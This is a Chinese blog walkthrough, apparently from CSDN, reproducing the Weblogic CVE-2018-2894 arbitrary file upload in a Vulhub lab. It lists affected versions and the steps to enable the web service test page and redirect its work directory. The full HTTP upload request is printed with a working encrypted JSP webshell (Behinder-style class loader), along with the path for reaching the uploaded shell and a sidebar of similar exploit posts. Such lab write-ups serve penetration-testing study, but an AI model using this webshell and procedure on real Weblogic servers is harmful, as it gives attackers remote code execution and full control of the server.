Weblogic (CVE-2018-2894)任意文件上传漏洞复现

已于 2022-08-07 16:49:12 修改
阅读量2.4k 收藏 2
点赞数
分类专栏: VulHub漏洞复现 文章标签: 网络 网络安全 服务器
于 2022-08-07 16:48:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60329395/article/details/126213310
版权

文章目录

漏洞描述

Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,可直接获取服务器权限。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。

Oracle 在2018年7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在’‘生产模式’’ 下默认不开启,所以该漏洞有一定限制

漏洞影响

漏洞影响版本编号

Weblogic : 10.3.6.0
Weblogic : 12.1.3.0
Weblogic : 12.2.1.2
Weblogic : 12.2.1.3

漏洞复现

我这里使用Vulhub靶场,地址:https://vulhub.org/

进入对应的目录CVE编号-CVE-2018-2894

启动
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-v5B1wS3T-1659861677113)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20220807154737543.png)]

端口号为7001

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yblgdHWj-1659861677114)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20220807154823683.png)]

(1)访问靶场

http://192.168.153.128:7001/console

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1G3N7jR1-1659861677115)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20220807155103274.png)]

使用如下命令查看后台密码进行登录

tips:密码都是随机的

docker-compose logs | grep password

在这里插入图片描述
在这里插入图片描述

点击base_domain的配置,在“高级”中开启“启用 Web 服务测试页”选项:
在这里插入图片描述
在这里插入图片描述

(2)访问漏洞利用点

http://your:ip:7001/ws_utc/config.do

在这里插入图片描述

修改下方工作目录为

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

将work Home Dir设置为ws_utc应用的静态文件css目录,访问这个目录是无需权限的

在这里插入图片描述

(3)点击 左边 --》 安全 --》添加

在这里插入图片描述

开启抓包 上传冰蝎jsp马子, 点击提交
在这里插入图片描述

请求包和响应包如下:

POST /ws_utc/resources/setting/keystore?timestamp=1659858948412 HTTP/1.1
Host: 192.168.153.128:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1205793539201273369027795603
Content-Length: 1520
Origin: http://192.168.153.128:7001
Connection: close
Referer: http://192.168.153.128:7001/ws_utc/config.do
Cookie: SESS4fb3062c01f0cbc3b798d07b6f4dbfa0=26D2J7Tnz8tTXKlTD2H8bz7frHhgRIq_6fEuC4lKMr8; Drupal.toolbar.collapsed=0; JSESSIONID=_1B3SYvUgSu0Ix70uDPVw9DiaU1N8Eh4lzuUsf8_fKq-VT3oI_0I!-346528048
Upgrade-Insecure-Requests: 1

-----------------------------1205793539201273369027795603
Content-Disposition: form-data; name="ks_name"

ran
-----------------------------1205793539201273369027795603
Content-Disposition: form-data; name="ks_edit_mode"

false
-----------------------------1205793539201273369027795603
Content-Disposition: form-data; name="ks_password_front"

ranran
-----------------------------1205793539201273369027795603
Content-Disposition: form-data; name="ks_password"

ranran
-----------------------------1205793539201273369027795603
Content-Disposition: form-data; name="ks_password_changed"

true
-----------------------------1205793539201273369027795603
Content-Disposition: form-data; name="ks_filename"; filename="shell.jspx.jsp"
Content-Type: application/octet-stream

<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2"><jsp:directive.page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"/><jsp:declaration> class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}</jsp:declaration><jsp:scriptlet>String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);</jsp:scriptlet></jsp:root>
-----------------------------1205793539201273369027795603--

在这里插入图片描述

查看源码也可以获取时间戳
在这里插入图片描述

(4)使用获取到的时间戳访问webshell

http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]
http://vulfocus.fofa.so:45342/ws_utc/css/config/keystore/1636992939120_shell.jsp
1659860338407

在这里插入图片描述
在这里插入图片描述

修复建议

升级到最新版本

总结

一、访问 存在漏洞地址ip:7001/ws_utc/config.do

二、修改工作目录

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
三、抓包或查看源码获取时间戳

四、获取时间戳和文件名

五、访问页面 http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]

六、GetShell

Ranwu0
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[渗透测试笔记] 46.weblogic任意文件上传漏洞(CVE-2018-2894)
H4ppyD0g的博客
03-15 340
文章目录漏洞原理影响范围漏洞复现漏洞防御 漏洞原理 weblogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do 影响范围 weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。 漏洞复现 访问如下链接,查看weblogic版本 http://192.168.40.128:7001/console/login/
cve-2018-2894:cve-2018-2894 不同别人的利用方法
04-29
Weblogic任意文件上传漏洞CVE-2018-2894) 最近大家都在说这个漏洞,大家都注意到config.do这里发生了问题,但是其实根据 这里的信息,begin.do也是有问题。少扯淡,下面给出具体利用方法: 问题就出现下下面这个页面。 上传时候,修改name的值就可以了 避免大家麻烦,给出来: /../../../../../../wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/ 然后访问 就可以访问到了。 我写了一个批量利用的python脚本,会上传cat.jsp,然后执行whoami 另外的利用config.do的方法可以看下面:
weblogic 任意文件上传漏洞CVE-2018-2894
初见辉少
10-19 1706
Weblogic 任意文件上传漏洞CVE-2018-2894)vulhub复现
Weblogic任意文件上传漏洞CVE-2018-2894漏洞复现(基于vulhub)
最新发布
人若无名,便可专心练剑
04-10 1098
这个任意文件上传CVE-2018-2894漏洞,Oracle公司在7月份修复,需要我们自己手动配置才可以进行漏洞测试,所以这就需要我们拿到weblogic网站的登录账号密码,这里很多网站其实在实际中,都是默认密码的存在,所以可以通过一些工具进行测试下。这个漏洞利用vulhub复现下来,没什么难度,新手也是完全ok的,平常一些护网面试啥的经常会问Java相关的漏洞问题,就比如weblogic漏洞
Weblogic CVE-2018-2894 漏洞复现
07-23 7963
0x01 前言   Oracle官方发布了7月份的关键补丁更新CPU(Critical Patch Update),其中针对可造成远程代码执行的高危漏洞 CVE-2018-2894 进行修复:http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html 0x02 环境搭建 1、首先到Oracle官网下载...
CVE-2018-2894漏洞复现
IvesUnicorn的博客
07-25 3871
CVE-2018-2894漏洞复现
weblogic10.36 CVE-2018-2893补丁文件
08-02
weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修复 WebLogicCVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞...
WebLogic未授权任意文件上传漏洞
HAKUNAMATATATTA的博客
12-05 921
Weblogic Web Service Test Page 中存在一处任意文件上传漏洞, Web Service TestPage 在"生产模式"下默认不开启,所以该漏洞有一定限制。利用该漏洞,可以上传任意 jsp 文件,进而获取服务器权限。
Weblogic 任意文件上传漏洞CVE-2018-2894复现
qq_53105813的博客
01-12 1599
Weblogic 任意文件上传漏洞CVE-2018-2894复现
CVE-2018-2894复现
weixin_44576411的博客
12-24 1034
CVE-2018-2894 简述 CVE-2020-2894是基于JavaEE结构的中间件WebLogic产品的一个远程上传漏洞WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do;漏洞的影响范围 Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3。 原理 主要参考出处 在靶场机的目录下,将默认的目录WSTestPage
weblogic任意文件上传漏洞CVE-2018-2894复测
nejore的博客
06-10 369
weblogic任意文件上传漏洞CVE-2018-2894复测
buuctf [WebLogic]CVE-2018-2894
qq_1873822的博客
03-26 693
漏洞描述 (CVE-2018-2894)Weblogic任意文件上传 Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。 Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。 利用条件:需要知道部署应用的web目录 https:/
Weblogic任意文件上传漏洞
m0_65150886的博客
10-18 111
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
WebLogic 任意文件上传CVE-2018-2894漏洞复现
橘子女侠
07-23 1362
WebLogic 任意文件上传CVE-2018-2894漏洞复现 一、漏洞概述 1、漏洞编号:CVE-2018-2894 2、漏洞描述:Weblogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。 Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在...
CVE-2018-2894 Weblogic 任意文件上传漏洞复现
weixin_44533592的博客
03-05 218
CVE-2018-2894 Weblogic 任意文件上传漏洞复现 漏洞简介 WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do。 详细:http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html#AppendixFMW 影响范围 Oracle WebLogic Server,版本10.3.6.0,
weblogic cve-2018-2628
08-15
鉴于引用的内容,CVE-2018-2628是Oracle WebLogic Server的一个高危的Weblogic反序列化漏洞。攻击者可以利用该漏洞在未授权的情况下远程执行代码。通过使用相关的EXP工具,攻击者可以向目标WebLogic服务器发送攻击载荷,从而实现攻击。Oracle在2018年4月18日发布了关键补丁更新,其中包含了修复这个漏洞的补丁。要利用该漏洞,攻击者需要先启动JRMP Server,然后使用特定的参数来执行指定的命令。因此,需要采取相应的安全措施来保护WebLogic服务器,包括及时安装补丁和配置网络防火墙规则,以防止潜在的攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Weblogic T3协议反序列化漏洞CVE-2018-2628)](https://blog.csdn.net/Aaron_Miller/article/details/106657746)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [weblogic-CVE-2018-2628](https://blog.csdn.net/qq_45746681/article/details/109051094)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ranwu0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值